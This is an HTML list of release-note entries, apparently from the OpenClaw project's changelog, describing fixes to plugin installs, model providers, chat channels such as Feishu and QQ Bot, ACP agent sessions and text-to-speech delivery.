<li>Plugins/runtime deps: verify clean npm installs actually place requested bundled runtime packages in the managed install root, reporting exact missing specs instead of a false successful repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Plugins/discovery: ignore stale <code>plugins.load.paths</code> aliases that point back at packaged bundled plugin directories and have doctor remove them, keeping bundled plugins on the runtime-deps staging path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Models/LM Studio: preserve <code>@iq*</code> quant suffixes in model refs and provider matching so <code>/model lmstudio/...@iq3_xxs</code> keeps the exact LM Studio variant. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327545635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71474" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71474/hovercard" href="https://github.com/openclaw/openclaw/issues/71474">#71474</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327608782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71486/hovercard" href="https://github.com/openclaw/openclaw/pull/71486">#71486</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XinwuC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XinwuC">@XinwuC</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Matrix/cron: preserve the live Matrix delivery target when creating implicit announce reminder jobs so mixed-case room IDs are not reconstructed from lowercased session keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329391998" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71798" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71798/hovercard" href="https://github.com/openclaw/openclaw/issues/71798">#71798</a>.</li>
<li>Feishu: accept Schema 2.0 card action callbacks that report <code>context.open_chat_id</code> instead of legacy <code>context.chat_id</code>, so button callbacks no longer drop as malformed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328732574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71670/hovercard" href="https://github.com/openclaw/openclaw/issues/71670">#71670</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Feishu: keep synthetic card-action and bot-menu ids out of platform reply targets, using the real card callback message id when Feishu provides one and plain-sending otherwise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328744083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71673" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71673/hovercard" href="https://github.com/openclaw/openclaw/issues/71673">#71673</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Plugins/QQ Bot: prefer an installed QQ Bot plugin that declares it replaces the bundled <code>qqbot</code> channel, preventing duplicate <code>qqbot_channel_api</code> and <code>qqbot_remind</code> tool registration noise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223849801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63102" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63102/hovercard" href="https://github.com/openclaw/openclaw/issues/63102">#63102</a>.</li>
<li>Browser automation: keep stable tab ids and labels attached when Chromium replaces the raw target after form submissions or other action-triggered navigations, and return the replacement <code>targetId</code> from <code>/act</code> when the match is provable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075792997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46137/hovercard" href="https://github.com/openclaw/openclaw/issues/46137">#46137</a>.</li>
<li>QQ Bot: make <code>qqbot_remind</code> schedule, list, and remove Gateway cron jobs directly for owner-authorized senders instead of returning <code>cronParams</code> and relying on a follow-up generic <code>cron</code> tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319867451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70865" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70865/hovercard" href="https://github.com/openclaw/openclaw/issues/70865">#70865</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320478556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70937" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70937/hovercard" href="https://github.com/openclaw/openclaw/pull/70937">#70937</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GaosCode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GaosCode">@GaosCode</a>.</li>
<li>Agents/ACP: hide <code>sessions_spawn</code> ACP runtime options unless an ACP backend is loaded, and make <code>/acp doctor</code> call out <code>plugins.allow</code> blocking bundled <code>acpx</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Codex: keep ACP prompt/skill routing hidden unless an ACP runtime backend is available, and warn in doctor when enabled Codex plugin configs still route <code>openai-codex/*</code> models through PI. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Media delivery: avoid sending generated image attachments twice when the assistant reply already includes explicit <code>MEDIA:</code> lines for the same turn, and reject unsafe remote <code>MEDIA:</code> URLs before delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Codex harness: ignore retryable app-server error notifications after Codex recovers, and preserve the real nested error message for terminal app-server failures instead of replacing it with a generic failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Agents/Codex: prepare native Codex sub-agent session metadata without a nested Gateway session patch and add a focused Docker smoke for the app-server sub-agent path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/subagents: keep queued subagent announces session-only when the requester has no external channel target, avoiding ambiguous multi-channel delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189037839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59201/hovercard" href="https://github.com/openclaw/openclaw/issues/59201">#59201</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/larrylhollan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/larrylhollan">@larrylhollan</a>.</li>
<li>Image understanding: preserve configured provider-prefixed vision model metadata when callers request the model without the provider prefix, so custom image models keep their <code>input: ["text", "image"]</code> capability. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4017340728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33185/hovercard" href="https://github.com/openclaw/openclaw/issues/33185">#33185</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobe9312/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobe9312">@Kobe9312</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: restore the previous plugin index records if a concurrent config write conflict interrupts install, update, or uninstall metadata commits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: reject native plugin archives that do not include a valid <code>openclaw.plugin.json</code>, preventing manifestless archives from writing install records that later show missing-manifest diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: remove tracked managed plugin install directories even when the persisted install path differs from the default id-derived target, while still refusing deletes outside the managed extensions root. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/update: restore previous plugin index records if core update or channel setup hits a concurrent config write conflict after plugin metadata changes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/onboarding: defer channel/provider plugin install records until the owning config write commits, keeping setup failures from advancing the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: route configure and agent setup writes with pending plugin install records through the plugin index commit helper so provider onboarding metadata is not stripped by plain config writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/channels: merge pending channel plugin install records with the existing plugin index before config writes, preserving unrelated tracked installs during channel setup, resolve, remove, and capability repair flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: defer shipped <code>plugins.installs</code> index migration during config writes until the guarded config commit window and roll it back if the config write fails before commit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions: keep embedded runtime context out of the visible user prompt by sending it as a hidden next-turn custom message, and teach doctor to repair affected 2026.4.24 transcripts with duplicated prompt-rewrite branches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329177517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71761" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71761/hovercard" href="https://github.com/openclaw/openclaw/issues/71761">#71761</a>.</li>
<li>Gateway/subagents: keep direct-loopback backend RPCs authenticated with the shared gateway token/password off stale CLI paired-device scope baselines, so internal calls no longer hit <code>scope-upgrade</code> pairing prompts while remote, browser, node, device-token, and explicit-device paths still require normal pairing approval. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229478808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63548" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63548/hovercard" href="https://github.com/openclaw/openclaw/issues/63548">#63548</a>.</li>
<li>Providers/Azure OpenAI: give deployment-scoped image generation requests a longer 600s default timeout so slow <code>gpt-image-2</code> generations can complete without a per-call <code>timeoutMs</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328916892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71705/hovercard" href="https://github.com/openclaw/openclaw/issues/71705">#71705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/voytas75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/voytas75">@voytas75</a>.</li>
<li>Gateway/plugins: link source-checkout bundled runtime dependency caches instead of recursively copying <code>node_modules</code> on the gateway main thread, preventing local status, node, and skill probes from timing out during startup cache restores.</li>
<li>Skills/remote nodes: only expose remote macOS skill bins for connected nodes, clear stale bin matches when node probes fail, and include probe command, timeout, bin count, and connection state in timeout logs.</li>
<li>Skills/remote nodes: recognize <code>system.which</code> object-map responses when probing connected macOS nodes, so Linux gateways can expose macOS-only skills such as Apple Notes when the required binaries are installed remotely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329760105" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71877/hovercard" href="https://github.com/openclaw/openclaw/issues/71877">#71877</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/miguelarios/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/miguelarios">@miguelarios</a>.</li>
<li>CLI/gateway: keep diagnostic probes from creating first-time read-only device pairings, while still reusing cached device tokens for detailed read probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329202027" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71766/hovercard" href="https://github.com/openclaw/openclaw/issues/71766">#71766</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SunboZ/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SunboZ">@SunboZ</a>.</li>
<li>CLI/plugins: keep <code>message</code> startup, <code>channels logs</code>, <code>agents delete</code>, and <code>agents set-identity</code> off broad plugin preloading; message delivery still loads plugins when the action actually runs.</li>
<li>Image understanding: resolve configured image models such as local LM Studio vision entries before reporting <code>Unknown model</code> when the discovery registry has not registered that provider. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261396872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66486/hovercard" href="https://github.com/openclaw/openclaw/issues/66486">#66486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>QQ Bot: ignore self-echoed bot messages using the outbound ref-index marker, preventing mirrored replies from re-entering the agent loop while still allowing users to quote bot replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329883097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71912/hovercard" href="https://github.com/openclaw/openclaw/issues/71912">#71912</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangyc6003/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangyc6003">@wangyc6003</a>.</li>
<li>Sessions: separate reset freshness from session-store <code>updatedAt</code>, so heartbeat, cron, exec, and gateway bookkeeping no longer prevent configured daily/idle resets from rolling long-running channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285740424" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68315/hovercard" href="https://github.com/openclaw/openclaw/issues/68315">#68315</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232177002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63732/hovercard" href="https://github.com/openclaw/openclaw/issues/63732">#63732</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233422936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63820/hovercard" href="https://github.com/openclaw/openclaw/issues/63820">#63820</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291872905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69083" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69083/hovercard" href="https://github.com/openclaw/openclaw/issues/69083">#69083</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxatv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxatv">@maxatv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longhairedsi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longhairedsi">@longhairedsi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradfreels/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradfreels">@bradfreels</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akessel56/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akessel56">@akessel56</a>.</li>
<li>Sessions: clear queued system-event notices during <code>/new</code>, <code>/reset</code>, gateway <code>sessions.reset</code>, and daily/idle rollover so stale background updates cannot leak into the first prompt of the fresh session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265262942" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66864/hovercard" href="https://github.com/openclaw/openclaw/issues/66864">#66864</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/opeyio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/opeyio">@opeyio</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Magicray1217/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Magicray1217">@Magicray1217</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cedillarack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cedillarack">@cedillarack</a>.</li>
<li>CLI/agents: keep <code>agents bind</code>, <code>agents unbind</code>, and <code>agents bindings</code> on setup-safe channel metadata paths so they do not preload bundled plugin runtimes or stage runtime dependencies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329103021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71743" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71743/hovercard" href="https://github.com/openclaw/openclaw/issues/71743">#71743</a>.</li>
<li>Plugins/registry: preserve explicit disabled plugin records during registry migration without persisting every unused bundled plugin discovered on disk. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Windows/native: keep CLI startup and bundled provider plugin loading off Windows ESM raw-path failure paths, fixing native onboarding/install smoke on Node 24.</li>
<li>Plugins/doctor: read bundled channel doctor capabilities through the same packaged plugin directory resolver used by plugin loading, so published installs keep Matrix DM allowlist repairs on <code>channels.matrix.dm.*</code> instead of writing invalid top-level <code>dmPolicy</code> keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329162302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71757" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71757/hovercard" href="https://github.com/openclaw/openclaw/issues/71757">#71757</a>.</li>
<li>Plugins/Windows: keep bundled plugin Jiti loaders off the native import path on Windows so channel plugins such as Telegram no longer crash with <code>ERR_UNSUPPORTED_ESM_URL_SCHEME</code> on <code>C:\...</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329134759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71749" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71749/hovercard" href="https://github.com/openclaw/openclaw/issues/71749">#71749</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smeyer9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smeyer9">@smeyer9</a>.</li>
<li>Providers/Ollama: use Ollama's current <code>/api/web_search</code> endpoint and honor <code>https://ollama.com</code> model-provider base URLs for Ollama Web Search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329095399" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71741/hovercard" href="https://github.com/openclaw/openclaw/issues/71741">#71741</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madhvidua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madhvidua">@madhvidua</a>.</li>
<li>Memory/Ollama: serialize Ollama memory embedding batches and add an inline batch timeout override, with longer defaults for local/self-hosted embedding providers.</li>
<li>Sessions/usage: exclude compaction checkpoint transcript snapshots from usage totals and session discovery, while keeping old checkpoint files removable.</li>
<li>CLI/agents: keep <code>openclaw agents list --json</code> on the config-only path by default, avoiding bundled plugin loading unless callers request <code>--bindings</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329088196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71739" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71739/hovercard" href="https://github.com/openclaw/openclaw/issues/71739">#71739</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaloster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaloster">@kaloster</a>.</li>
<li>Plugins/install: force plugin dependency installs to stay project-local even when inherited npm config requests global installs, so successful installs still materialize the plugin's staged <code>node_modules</code>.</li>
<li>Providers/Google: transcode Gemini TTS PCM to Opus for voice-note targets so WhatsApp and other native voice-note replies can play as voice messages.</li>
<li>TTS/WhatsApp: mark non-Opus provider output as voice-note intent so channel delivery transcodes MP3/WebM replies to Ogg/Opus PTT audio.</li>
<li>Plugins/runtime deps: reuse existing external bundled-plugin stage roots when mirrored plugin roots are inspected again, avoiding second-generation <code>openclaw-unknown-*</code> stages and repeated first-turn restaging. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328214258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71599/hovercard" href="https://github.com/openclaw/openclaw/issues/71599">#71599</a>.</li>
<li>iOS/macOS Talk Mode: allow <code>talk.speechLocale</code> to set the speech recognition locale for non-English voice conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069022882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44688" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44688/hovercard" href="https://github.com/openclaw/openclaw/issues/44688">#44688</a>.</li>
<li>Plugins/providers: honor explicit plugin candidate lists instead of reading a persisted registry snapshot from local state, keeping candidate-scoped provider discovery hermetic.</li>
<li>Plugins/doctor: keep bundled plugin runtime-dependency repairs inside the managed OpenClaw stage even when user npm prefix/global config points npm at <code>$HOME/node_modules</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
<li>ACP/sessions_spawn: reject normal OpenClaw config agent ids when callers explicitly request <code>runtime="acp"</code>, while allowing agents configured with <code>runtime.type="acp"</code> to resolve to their ACP harness id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234724919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63914" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63914/hovercard" href="https://github.com/openclaw/openclaw/issues/63914">#63914</a>.</li>
<li>ACP/sessions_spawn: apply <code>runTimeoutSeconds</code> to ACP child turns and dispatch those turns on the background subagent lane, so quota-stalled ACP harnesses do not occupy the main agent lane indefinitely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289936854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68823/hovercard" href="https://github.com/openclaw/openclaw/issues/68823">#68823</a>.</li>
<li>ACP/oneshot: reconcile runtime session identity before closing completed oneshot ACP runs, so finished <code>sessions.json</code> entries do not stay stuck with <code>acp.identity.state="pending"</code>.</li>
<li>ACPX: bundle <code>acpx@0.6.1</code> so unsupported generic model overrides fail clearly instead of silently falling back to the target adapter default.</li>
<li>ACP/models: document that non-Codex ACP model overrides require adapter support for ACP <code>models</code> plus <code>session/set_model</code>, so unsupported harnesses fail clearly instead of silently falling back to their defaults.</li>
<li>Plugins/Voice Call: treat missing provider credentials as setup-incomplete during Gateway startup and log the missing keys as a warning instead of a runtime startup error, while keeping explicit command/tool errors when used.</li>
<li>Android/Talk Mode: prevent duplicate TTS playback when fast or repeated final chat events arrive while Talk Mode is waiting for its own response. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076624751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46546/hovercard" href="https://github.com/openclaw/openclaw/issues/46546">#46546</a>.</li>
<li>Tooling/check:changed: pass parent heavy-check lock markers to lint lanes so <code>pnpm check:changed</code> no longer waits on its own <code>lint:extensions</code> child.</li>
<li>CLI/completion: dedupe provider auth flags before registering <code>openclaw onboard</code> options, so completion-cache refresh during update no longer fails when stale core fallback flags overlap plugin manifest flags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328717666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71667" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71667/hovercard" href="https://github.com/openclaw/openclaw/issues/71667">#71667</a>.</li>
<li>Diagnostics/trace: report live context usage from the current prompt snapshot instead of provider turn totals, avoiding false near-full context spikes on cached or tool-heavy runs.</li>
<li>Providers/Google: honor <code>models.providers.google.request.allowPrivateNetwork</code> for Gemini TTS and telephony TTS, matching Google image generation and media understanding. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329016945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71723/hovercard" href="https://github.com/openclaw/openclaw/pull/71723">#71723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ro-hansolo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ro-hansolo">@ro-hansolo</a>.</li>
